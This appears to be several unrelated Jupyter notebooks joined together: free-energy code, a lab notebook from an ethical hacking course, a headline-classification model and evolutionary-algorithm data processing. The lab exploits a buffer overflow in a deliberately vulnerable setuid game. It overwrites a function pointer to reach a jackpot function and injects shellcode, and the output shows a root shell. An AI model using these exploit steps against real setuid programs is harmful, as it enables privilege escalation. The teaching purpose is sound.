# all obs
ops = operators(seqs)
energies_w = energy_ops(ops,w)
probs_w = np.exp(energies_w)
Z_direct = (probs_w/seq_count).mean()
lnZ_direct = np.log(Z_direct) + np.log(n_seq)
print(lnZ_direct)
# Z from optimal eps
eps0 = eps_list[ieps]
print(eps0)
ops_unique = operators(seq_unique)
energies_w = energy_ops(ops_unique,w)
probs_w = np.exp(eps0*energies_w)
Z1 = (probs_w).sum()
Z2 = (seq_count1*np.exp((eps0-1)*energies_w)).sum()
lnZ = np.log(Z1*n_seq/Z2)
print(lnZ)
seq_unique.shape[0]
# VP modification -1/13/2020
def free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2e-1,toler=0.1):
energies_w = energy_ops(ops_uniq,w)
log_f_count = np.log(f_count_uniq)
entropy = - np.sum(f_count_uniq*log_f_count)
E_mean_f = -np.sum(energies_w*f_count_uniq)
F_0 = E_mean_f - entropy
F_gamma = F_0
update = np.inf
while update > toler:
F_gamma_new = F_0 + np.sum(f_count_uniq*np.sinh(gamma*(F_gamma + energies_w - log_f_count)))/gamma
print((F_gamma + energies_w - log_f_count)[3:7])
update = np.abs(F_gamma - F_gamma_new)
F_gamma = F_gamma_new
return F_gamma
def free_energy_improved(f_count_uniq,ops_uniq,w,gamma=0.02,toler=5e-2):
F_true = 4*(free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=gamma,toler=toler)-\
0.25*free_energy_fixed_point(f_count_uniq,ops_uniq,w,gamma=2*gamma,toler=toler))/3.0
return F_true
# VP modification - 1/13/2020
# try to get free energy by integrating mean energy over temperature
def free_energy_integrated(f_count_uniq,ops_uniq,w,d_beta=0.1,obs=True):
E_mean_f = 0.0
for i in range(int(1.0/d_beta)):
bet = (i+0.5)*d_beta
if obs:
E_mean_f += -np.sum(energies_w*f_count_uniq**bet)/np.sum(f_count_uniq**bet)
else:
E_mean_f += -np.sum(energies_w*np.exp(energies_w*bet))/np.sum(np.exp(energies_w*bet))
return E_mean_f*d_beta
# VP modification -1/13/2020
# try to find free energy with the upper and lower bounds
freq_count1 = seq_count1/n_seq
freq_count1_test = seq_count1_test/n_seq
ops_unique_test = operators(seq_unique_test)
E_mean_f_list = np.zeros(len(eps_list))
lnZ_unique_list = np.zeros(len(eps_list))
lnZ_unique_E_mean_list = np.zeros(len(eps_list))
X_squared_list = np.zeros(len(eps_list))
X_squared_list_train = np.zeros(len(eps_list))
for i,eps in enumerate(eps_list):
energies_w = energy_ops(ops_unique,w_eps[i,:])
energies_w_test = energy_ops(ops_unique_test,w_eps[i,:])
# lnZ_unique = -free_energy_improved(freq_count1,ops_unique,w_eps[i,:],gamma=0.04,toler=1e-1)
lnZ_unique = -free_energy_integrated(freq_count1,ops_unique,w_eps[i,:],obs=False)
E_mean_f = -np.sum(energies_w*freq_count1)
E_mean_f_test = -np.sum(energies_w_test*freq_count1_test)
probs_test = np.exp(energies_w_test-lnZ_unique)
probs_train = np.exp(energies_w-lnZ_unique)
print(eps,E_mean_f,lnZ_unique,-lnZ_unique - E_mean_f,-lnZ_unique - E_mean_f_test,np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test))
# 2020.01.13: Tai added
E_mean_f_list[i] = E_mean_f
lnZ_unique_list[i] = lnZ_unique
lnZ_unique_E_mean_list[i] = -lnZ_unique - E_mean_f
X_squared_list[i] = np.mean(((probs_test-freq_count1_test)**2)/freq_count1_test)
X_squared_list_train[i] = np.mean(((probs_train-freq_count1)**2)/freq_count1)
nx,ny = 1,6
fig, ax = plt.subplots(ny,nx,figsize=(nx*3,ny*2.2))
ax[0].plot(eps_list, MSE[:,-1],'ko-')
ax[1].plot(eps_list, E_mean_f_list,'ko-')
ax[2].plot(eps_list, lnZ_unique_list,'ko-')
ax[3].plot(eps_list, lnZ_unique_E_mean_list,'ko-')
ax[4].plot(eps_list, X_squared_list,'ko-')
ax[5].plot(eps_list, X_squared_list_train,'ko-')
ax[0].set_ylabel('MSE')
ax[1].set_ylabel('Energy')
ax[2].set_ylabel('LnZ')
ax[3].set_ylabel('-LnZ-Energy')
ax[4].set_ylabel('X_sequared_test')
ax[5].set_ylabel('X_sequared_train')
plt.tight_layout(h_pad=0.5, w_pad=0.6)
#plt.savefig('fig1.pdf', format='pdf', dpi=100)
```
|
github_jupyter
|
# Global Segment Overflow
- recall function pointers are pointers that store addresses of functions/code
- see [Function-Pointers notebook](./Function-Pointers.ipynb) for a review
- function pointers can be overwritten using overflow techniques to point to different code/function
## Lucky 7 game
- various luck-based games that're favored to the house
- program uses a function pointer to remember the last game played by the user
- the last game function's address is stored in the **User** structure
- player object is declared as an uninitialized global variable
- meaning the memory is allocated in the **bss** segment
- seteuid multi-user program that stores player's data in /var folder
- only root or sudo user can access players' info stored in /var folder
- each player is identified by the system's user id
- examine and compile and run game programs in demos/other_overflow/ folder
- game is divided into one header file and 2 .cpp files
- use the provided Makefile found in the same folder; uses C++17 specific features such as system specific file permission
- NOTE: program must be setuid, to read/write the database file: `/var/lucky7.txt`
```
! cat demos/other_overflow/main.cpp
! cat demos/other_overflow/lucky7.cpp
```
- change current working directory to other_overflow folder where the program and Makefile are
- compile using the Makefile
```
%cd ./demos/other_overflow
! echo kali | sudo -S make
# program uses /var/lucky7.txt to store player's information
# let's take a look into it
! echo kali | sudo -S cat /var/lucky7.txt
# userid credits palaer's_full_name
# if file exists, delete it to start fresh
! echo kali | sudo -S rm /var/lucky7.txt
! ls -al /var/lucky7.txt
! ls -l lucky7.exe
```
### play the interactive game
- lucky is an interactive program that doesn't work with Jupyter Notebook as of Aug. 2021
- Use Terminal to play the program; follow the menu provided by the program to play the game
- press `CTRL-Z` to temporarily suspend (put it in background) the current process
- enter `fg` command to bring the suspended program to fore ground
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith
Welcome to the Lucky 7 Game John Smith.
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] -> Enter your choice [1-7]: 2
~*~*~ Lucky 777 ~*~*~
Costs 50 credits to play this game.
Machine will generate 3 random numbers each between 1 and 9.
If all 3 numbers are 7, you win a jackpot of 100 THOUSAND
If all 3 numbers match, you win 10 THOUSAND
Otherwise, you lose.
Enter to continue...
[DEBUG] current_game pointer 0x0804b1cd
3 random numers are: 4 3 4
Sorry! Better luck next time...
You have 450 credits
Would you like to play again? [y/n]:
```
### Find the vulnerability in the game
- do code review to find global **player** object and `change_username()`
- note **user** struct has declared name buffer of 100 bytes
- change_username() function uses `mgest()` function to read and store data into name field one character at a time until '\n'
- there's nothing to limit it to the length of the destination buffer!
- so, the game has buffer overrun/overflow vulnerability!
### Exploit the overflow vulnerability
- run the program
- explore the memory addresses of **name** and **current_game** using peda/gdb
- use gdb to debug the live process
- find the process id of lucky7.exe process
```bash
┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe
root 30439 0.1 0.0 5476 1344 pts/2 S+ 10:54 0:00 ./lucky7.exe
kali 30801 0.0 0.0 6320 724 pts/3 S+ 10:59 0:00 grep --color=auto lucky7.exe
- use the process_id to debug in gdb
┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ sudo gdb -q --pid=59004 --symbols=./lucky7.exe
(gdb) p/x &player.name
$1 = 0x8050148
(gdb) p/x &player.current_game
$2 = 0x80501ac
(gdb) p/u 0x80501ac - 0x8050148 # (address of player.current_game) - (address of player.name)
$3 = 100
```
- notice, **name[100]** is at a lower address
- **(\*current_game)()** is at a higher address find the exact size that would overlfow the current_game
- the offset should be at least 100 bytes
### Let's overwrite the current_game's value with our controlled address
- create a string with 100As + BBBB
- detach the process from gdb and change the name with menu option 5 pasting the following buffer
- Enter 1 to play the game and the buffer should overwrite the [DEBUG] current_game pointer with 0x42424242
```
# change the name to the following string
! python -c 'print("A"*100 + "B"*4)'
```
- run the program and play the last game after changing name
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe
Database file doesn't exist: /var/lucky7.txt
-=-={ New Player Registration }=-=-
Enter your name: John Smith
Welcome to the Lucky 7 Game John Smith.
You have been given 500 credits.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 500 credits] -> Enter your choice [1-7]: 1
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.
[DEBUG] current_game pointer 0x0804b141
the random number is: 8
Sorry! Better luck next time...
You have 490 credits
Would you like to play again? [y/n]: n
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith]
[You have 490 credits] -> Enter your choice [1-7]: 5
Change user name
Enter your new name:
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB
Your name has been changed.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBB]
[You have 490 credits] -> Enter your choice [1-7]: 1
[DEBUG] current_game pointer 0x42424242
zsh: segmentation fault ./lucky7.exe
```
### Find useful functions/code in the program to execute
- **nm** command lists symbols in object files with corresponding addresses
- can be used to find addresses of various functions in a program
- `jackpot()` functions are intruiging!
```bash
┌──(kali㉿K)-[~/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ nm ./lucky7.exe 139 ⨯
08050114 B __bss_start
08050120 b completed.0
U __cxa_atexit@GLIBC_2.1.3
08050104 D DATAFILE
080500f8 D __data_start
080500f8 W data_start
0804a440 t deregister_tm_clones
0804a420 T _dl_relocate_static_pie
0804a4c0 t __do_global_dtors_aux
0804fee4 d __do_global_dtors_aux_fini_array_entry
080500fc D __dso_handle
08050100 V DW.ref.__gxx_personality_v0
0804fee8 d _DYNAMIC
08050114 D _edata
080501b4 B _end
U exit@GLIBC_2.0
0804c3d8 T _fini
0804d000 R _fp_hw
0804a4f0 t frame_dummy
0804fed8 d __frame_dummy_init_array_entry
0804e438 r __FRAME_END__
U getchar@GLIBC_2.0
U getuid@GLIBC_2.0
08050000 d _GLOBAL_OFFSET_TABLE_
0804c34a t _GLOBAL__sub_I_DATAFILE
0804b5a0 t _GLOBAL__sub_I__Z10get_choiceR4User
w __gmon_start__
0804d7e4 r __GNU_EH_FRAME_HDR
U __gxx_personality_v0@CXXABI_1.3
0804a000 T _init
0804fee4 d __init_array_end
0804fed8 d __init_array_start
0804d004 R _IO_stdin_used
0804c3d0 T __libc_csu_fini
0804c370 T __libc_csu_init
U __libc_start_main@GLIBC_2.0
0804bcda T main
08050140 B player
U printf@GLIBC_2.0
U puts@GLIBC_2.0
U rand@GLIBC_2.0
0804a480 t register_tm_clones
U sleep@GLIBC_2.0
U srand@GLIBC_2.0
0804a3e0 T _start
U strcpy@GLIBC_2.0
U strlen@GLIBC_2.0
U time@GLIBC_2.0
08050114 D __TMC_END__
U _Unwind_Resume@GCC_3.0
0804bcd2 T __x86.get_pc_thunk.ax
0804c3d1 T __x86.get_pc_thunk.bp
0804a430 T __x86.get_pc_thunk.bx
0804bcd6 T __x86.get_pc_thunk.si
0804a4f2 T _Z10get_choiceR4User
0804bfeb T _Z10jackpot10Kv !!!!!!!!!<- JACKPOT ---> !!!!!!!!!!
0804b2b8 T _Z10lucky77777v
0804c038 T _Z11jackpot100Kv
0804b042 T _Z11printNumberi
0804b3fb T _Z12reset_creditPcR4User
0804aeeb T _Z12show_creditsRK4User
0804c181 T _Z13play_the_gamev
0804c0d2 T _Z14deduct_creditsv
0804c29c T _Z15change_usernamev
0804ac37 T _Z16read_player_dataPcR4User
0804b429 T _Z17get_random_numberi
0804a97f T _Z18update_player_dataPcR4User
0804a6c0 T _Z19register_new_playerPcR4User
0804b547 t _Z41__static_initialization_and_destruction_0ii
0804c2f1 t _Z41__static_initialization_and_destruction_0ii
0804ae82 T _Z5mgetsPc
0804b141 T _Z6lucky7v
0804b46d T _Z6rstripRNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE
0804b1cd T _Z8lucky777v
0804c085 T _Z9jackpot1Mv
0804b7fc W _ZN9__gnu_cxx11char_traitsIcE2eqERKcS3_
0804b81c W _ZN9__gnu_cxx11char_traitsIcE6lengthEPKc
...
```
### Script the interactive user input
- instead of typing options and commands interactively, they can be scripted and piped into the program
- program can then parse and use the input as if someone is interactively typing it from the std input stream
- make sure the game has been played atleast once by the current user
- the following script needs to start with full name otherwise!
```
# play game #1, y, n;
# Enter 7 to quit
! python -c 'print("1\ny\nn\n7")'
%pwd
! python -c 'print("1\ny\nn\n7")' | ./lucky7.exe
# let's replace the current_game with out own data (BBBB)
! python -c 'print("1\nn\n5\n" + "A"*100 + "BBBB\n" + "1\nn\n7")' | ./lucky7.exe
# note the jackpot()'s address
! nm ./lucky7.exe | grep jackpot
# let's create a string mimicking game play with jackpot100K address!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")'
# the following is the sequnce of user input to play the game
# now let's hit the Jackpot to receive 100K credit!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\nn\n7\n")' | ./lucky7.exe
# let's hit the Jackpot 2 times in a row!
# and change to your actual name
# now let's hit the Jackpot!
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\xb8\xbf\x04\x08\n" + b"1\ny\nn\n5\nJohn Smith\n2\nn\n7\n")' | ./lucky7.exe
```
## Exploiting with shellcode
### Stashing Shellcode as Environment Varaible
- compile `getenvaddr.cpp` file as 32-bit binary
```
! g++ -m32 -o getenvaddr.exe getenvaddr.cpp
```
- export `/shellcode/shellcode_root.bin` as an env variable
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ export SHELLCODE=$(cat ../../shellcode/shellcode_root.bin)
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./getenvaddr.exe SHELLCODE ./lucky7.exe
SHELLCODE will be at 0xffffdf80 with reference to ./lucky7.exe
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n" + b"A"*100 + b"\x80\xdf\xff\xff\n" + b"1\n")' > env_exploit
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ cat env_exploit - | ./lucky7.exe
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
[You have 858770 credits] -> Enter your choice [1-7]:
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.
[DEBUG] current_game pointer 0x0804b0bf
the random number is: 4
Sorry! Better luck next time...
You have 858760 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�]
[You have 858760 credits] -> Enter your choice [1-7]:
Change user name
Enter your new name:
Your name has been changed.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����]
[You have 858760 credits] -> Enter your choice [1-7]:
[DEBUG] current_game pointer 0xffffdf80
whoami
root
exit
```
- congratulations on getting your shellcode executed!!
### Smuggling Shellcode into Program's Buffer
### Note: not working!!!
- as the program is setuid; it "should" give you a root shell if you can manage to smuggle and execute root shellcode!
- goal is to overwrite `player.name` with shellcode
- overflow the `player.current_game` attribute with the address of the smuggled shellcode
- NOTE: we're not overflowing the return address, though you could!
- find the address of `player.name` attribute using gdb
- run `lucky7.exe` game from a terminal
- from another terminal finds its pid
```bash
# Terminal 1
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ ./lucky7.exe
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: John Smith ]
[You have 809140 credits] -> Enter your choice [1-7]:
#Terminal 2
┌──(kali㉿K)-[~]
└─$ ps aux | grep lucky7.exe
root 2639 0.0 0.0 5476 1264 pts/2 S+ 15:01 0:00 ./lucky7.exe
kali 2932 0.0 0.0 6320 660 pts/3 S+ 15:01 0:00 grep --color=auto lucky7.exe
┌──(kali㉿K)-[~]
└─$ sudo gdb -q --pid=2639
[sudo] password for kali:
Attaching to process 2639
Reading symbols from /home/kali/projects/EthicalHacking/demos/other_overflow/lucky7.exe...
Reading symbols from /lib32/libstdc++.so.6...
(No debugging symbols found in /lib32/libstdc++.so.6)
Reading symbols from /lib32/libgcc_s.so.1...
(No debugging symbols found in /lib32/libgcc_s.so.1)
Reading symbols from /lib32/libc.so.6...
(No debugging symbols found in /lib32/libc.so.6)
Reading symbols from /lib32/libm.so.6...
(No debugging symbols found in /lib32/libm.so.6)
Reading symbols from /lib/ld-linux.so.2...
(No debugging symbols found in /lib/ld-linux.so.2)
0xf7fcb559 in __kernel_vsyscall ()
warning: File "/home/kali/.gdbinit" auto-loading has been declined by your `auto-load safe-path' set to "$debugdir:$datadir/auto-load".
To enable execution of this file add
add-auto-load-safe-path /home/kali/.gdbinit
line to your configuration file "/root/.gdbinit".
To completely disable this security protection add
set auto-load safe-path /
line to your configuration file "/root/.gdbinit".
For more information about this security protection see the
"Auto-loading safe path" section in the GDB manual. E.g., run from the shell:
info "(gdb)Auto-loading safe path"
(gdb) p/x &player.name
$1 = 0x8050128
(gdb) p/x &player.current_game
$2 = 0x805018c
(gdb) p/u 0x805018c - 0x8050128
$3 = 100
(gdb)
(gdb) quit
```
- so the address of `player.name` is 0x8050128
- the offset to overwrite `player.current_game` from `player.name` is 100!
- exploit code should look like this: [NOP sled | shellcode | SHELLCODE_ADDRESS]
- NOP sled + shellcode should be 100 bytes long
- let's find the length of the root shellcode in `shellcode` folder
```
%pwd
%cd ./demos/other_overflow
! wc -c ../../shellcode/shellcode_root.bin
# total NOP sled
100 - 35
# let's write NOP sled to a binary file
! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*65)' > ./lucky7_exploit.bin
! wc -c ./lucky7_exploit.bin
# lets append shellcode to the exploitcode
! cat ../../shellcode/shellcode_root.bin >> ./lucky7_exploit.bin
# let's check the size of exploit code
! wc -c ./lucky7_exploit.bin
print(hex(0x08050128 + 25))
# let's append the address of player.name: 0x8050128
! python -c 'import sys; sys.stdout.buffer.write(b"\x41\x01\x05\x08\n")' >> ./lucky7_exploit.bin
! hexdump -C ./lucky7_exploit.bin
# let's check the size of exploit code
! wc -c ./lucky7_exploit.bin
! python -c 'import sys; sys.stdout.buffer.write(b"1\nn\n5\n")' > lucky7_final_exploit.bin
! hexdump -C lucky7_final_exploit.bin
! cat lucky7_exploit.bin >> lucky7_final_exploit.bin
! python -c 'import sys; sys.stdout.buffer.write(b"1\n")' >> lucky7_final_exploit.bin
! wc -c ./exploit_game.bin
! hexdump -C ./lucky7_final_exploit.bin
```
- exploit the program with the final exploit created
```
$ cat lucky7_final_exploit.bin - | ./lucky7.exe
```
- NOTICE: the hyphen after the exploit
- tells the cat program to send standard input after the exploit buffer, returning control of the input
- eventhough the shell doesn't display its prompt, it is still accessible
- stash both and user and root shell and force the program execute them
```bash
┌──(kali㉿K)-[~/projects/EthicalHacking/demos/other_overflow]
└─$ cat lucky7_final_exploit.bin - | ./lucky7.exe
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: ��������������������������������������������������������1����$h/zsh/binh/usr ]
[You have 918420 credits] -> Enter your choice [1-7]:
~*~*~ Lucky 7 ~*~*~
Costs 10 credits to play this game.
Machine will generate 1 random numbers each between 1 and 9.
If the number is 7, you win a jackpot of 10 THOUSAND
Otherwise, you lose.
[DEBUG] current_game pointer 0x0804b0bf
the random number is: 7
*+*+*+*+*+* JACKPOT 10 THOUSAND *+*+*+*+*+*
Congratulations!
You have won the jackpot of 10000 (10K) credits!
You have 928410 credits
Would you like to play again? [y/n]: -=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: ��������������������������������������������������������1����$h/zsh/binh/usr �]
[You have 928410 credits] -> Enter your choice [1-7]:
Change user name
Enter your new name:
Your name has been changed.
-=[ Lucky 7 Game Menu ]=-
1 - Play Lucky 7 game
2 - Play Lucky 777 game
3 - Play Lucky 77777 game
4 - View your total credits
5 - Change your user name
6 - Reset your account at 500 credits
7 - Quit
[Name: �����������������������������������������������������������������1�1�1ə��j
XQh//shh/bin��Q��S��]
[You have 928410 credits] -> Enter your choice [1-7]:
[DEBUG] current_game pointer 0x08050141
ls
zsh: broken pipe cat lucky7_final_exploit.bin - |
zsh: segmentation fault ./lucky7.exe
```
## Exercise
- smuggle the shellcode into the name field, find it's address and exploit the program.
- smuggle both user and root shells
|
github_jupyter
|
```
#import modules
import re
import nltk
import numpy as np
import pandas as pd
from nltk.stem.porter import PorterStemmer
from nltk.corpus import stopwords
from sklearn.naive_bayes import GaussianNB
from sklearn.model_selection import train_test_split
from sklearn.feature_extraction.text import CountVectorizer
from sklearn import metrics
from sklearn.model_selection import RepeatedStratifiedKFold, GridSearchCV
from sklearn.pipeline import Pipeline
from sklearn.decomposition import PCA
#import dataset
df = pd.read_csv("./Datasets/Combined_dataset.csv", parse_dates=["Date"], index_col="Date")
df
df.info()
#text cleaning
cleaned_headlines = []
ps = PorterStemmer()
for i in range(0, len(df)):
headlines = re.sub('[^a-zA-Z]', ' ', df['Headlines'][i])
headlines = headlines.lower()
headlines = headlines.split()
headlines_stopwords = stopwords.words('english')
headlines_stopwords.remove('not')
headlines = [ps.stem(word) for word in headlines if not word in set(headlines_stopwords)]
headlines = ' '.join(headlines)
cleaned_headlines.append(headlines)
len(cleaned_headlines)
#vectorization
cv = CountVectorizer()
X = cv.fit_transform(cleaned_headlines).toarray()
Y = df.iloc[:, -1].values
Y
#split the data into train and test
X_train,X_test,Y_train,Y_test = train_test_split(X,Y,test_size=0.2,random_state=0)
#create model
nb_model = GaussianNB()
nb_model.fit(X_train,Y_train)
#predict Y
Y_predict = nb_model.predict(X_test)
np.concatenate((Y_predict.reshape(len(Y_predict),1), Y_predict.reshape(len(Y_predict),1)),1)
#check confusion matrix and accuracy
print(metrics.confusion_matrix(Y_test, Y_predict))
print(metrics.accuracy_score(Y_test, Y_predict))
##Hyperparameter Tuning
cv_method = RepeatedStratifiedKFold(n_splits=5, n_repeats=3, random_state=999)
params_NB = {'var_smoothing': np.logspace(0,-9, num=10)}
gs_NB = GridSearchCV(estimator=nb_model, param_grid=params_NB, cv=cv_method, verbose=1, scoring='accuracy')
gs_NB.fit(X, Y)
result = gs_NB.cv_results_
print("Tuned Logistic Regression Parameters: {}".format(gs_NB.best_params_))
print("Best score is {}".format(gs_NB.best_score_))
pipe = Pipeline(steps=[
('pca', PCA()),
('estimator', GaussianNB()),
])
parameters = {'estimator__var_smoothing': [1e-11, 1e-10, 1e-9]}
Bayes = GridSearchCV(pipe, parameters, scoring='accuracy', cv=10).fit(X, Y)
print(Bayes.best_estimator_)
print('best score: {}'.format(Bayes.best_score_))
predictions = Bayes.best_estimator_.predict(X_test)
np.concatenate((predictions.reshape(len(predictions),1), predictions.reshape(len(predictions),1)),1)
```
|
github_jupyter
|
This notebook contains the code needed to process the data which tracks the POIS and diversity, as generated by the SOS framework
Because of the large size of these tables, not all in-between artifacts are provided
This code is part of the paper "The Importance of Being Restrained"
```
import numpy as np
import pickle
import pandas as pd
from functools import partial
import glob
import seaborn as sbs
import matplotlib.pyplot as plt
from scipy.stats import kendalltau, rankdata
font = {'size' : 20}
plt.rc('font', **font)
base_folder = "/mnt/e/Research/DE/" #Update to required folder
output_location = "Datatables/"
def get_merged_dt(cross, sdis, F, CR, popsize):
dt_large = pd.DataFrame()
files = glob.glob(f"{base_folder}Runs_only/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt")
for f in files:
dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
dt_large = dt_large.append(dt_temp)
dt_large['cross'] = cross
dt_large['sdis'] = sdis
dt_large['F'] = F
dt_large['CR'] = CR
dt_large['popsize'] = popsize
return dt_large
def get_full_dt():
dt_full = pd.DataFrame()
for cross in ['b','e']:
for sdis in ['c', 'h', 'm', 's', 't', 'u']:
for CR in ['005', '099']:
for F in ['0916', '005']:
for popsize in [5,20,100]:
dt_temp = get_merged_dt(cross, sdis, F, CR, popsize)
dt_full = dt_full.append(dt_temp)
return dt_full
def get_merged_dt_v2(cross, sdis, F, CR, popsize):
dt_large = pd.DataFrame()
files = glob.glob(f"{base_folder}CosineSimilarity-MoreData/CosineSimilarity-MoreData/7/DEro{cross}{sdis}p{popsize}D30*F{F}Cr{CR}.txt")
if len(files) == 0:
return dt_large
for f in files:
dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
dt_large = dt_large.append(dt_temp)
dt_large['cross'] = cross
dt_large['sdis'] = sdis
dt_large['F'] = F
dt_large['CR'] = CR
dt_large['popsize'] = popsize
dt_large.columns = ['cosine', 'applied', 'accept', 'cross', 'sdis', 'F', 'CR', 'popsize']
return dt_large
for cross in ['b','e']:
for sdis in ['c', 'h', 'm', 's', 't', 'u']:
for CR in ['005','0285','052','0755','099']:
for F in ['005','0285','052','0755','099']:
for popsize in [5,20, 100]:
dt = get_merged_dt_v2(cross, sdis, F, CR, popsize)
dt.to_csv(f"{output_location}DEro{cross}_{sdis}_p{popsize}_F{F}CR{CR}_cosine.csv")
def get_merged_dt_v3(sdis, F, CR, popsize):
dt_large = pd.DataFrame()
files = glob.glob(f"{base_folder}CosineSimilarity-LookingCloser/7/DErob{sdis}p{popsize}D30*F{F}Cr{CR}.txt")
if len(files) == 0:
return dt_large
for f in files:
dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
dt_large = dt_large.append(dt_temp)
dt_large['sdis'] = sdis
dt_large['F'] = F
dt_large['CR'] = CR
dt_large['popsize'] = popsize
dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']
return dt_large
for sdis in ['c', 'h', 'm', 's', 't', 'u']:
for popsize in [5, 20, 100]:
for idx_0, F in enumerate(['099','0755','052','0285','005']):
for idx_1, CR in enumerate(['0041','0081','0121','0161','0201']):
dt = get_merged_dt_v3(sdis, F, CR, popsize)
dt.to_csv(f"{output_location}DE_{sdis}_p{popsize}_F{F}CR{CR}_cosine_v3.csv")
def get_merged_dt_v4(sdis, F, CR, popsize):
dt_large = pd.DataFrame()
files = glob.glob(f"{base_folder}Div_cos_sim/CosineSimilarity/7/DErob{sdis}p{popsize}D30f0*_F{F}Cr{CR}.txt")
if len(files) == 0:
return dt_large
for f in files:
dt_temp = pd.read_csv(f, sep=' ', header=None, skiprows=1)
dt_large = dt_large.append(dt_temp)
dt_large['sdis'] = sdis
dt_large['F'] = F
dt_large['CR'] = CR
dt_large['popsize'] = popsize
dt_large.columns = ['cosine', 'nr_mut', 'nr_exceed', 'accept', 'sdis', 'F', 'CR', 'popsize']
return dt_large
for F in ['0285', '099', '052', '005']: #'0755',
for CR in ['0755', '0285', '099', '052', '005', '00891', '01283', '01675', '02067', '02458']:
for popsize in [5, 20, 100]:
for sdis in ['t', 'h', 'm', 's', 'c', 'u']:
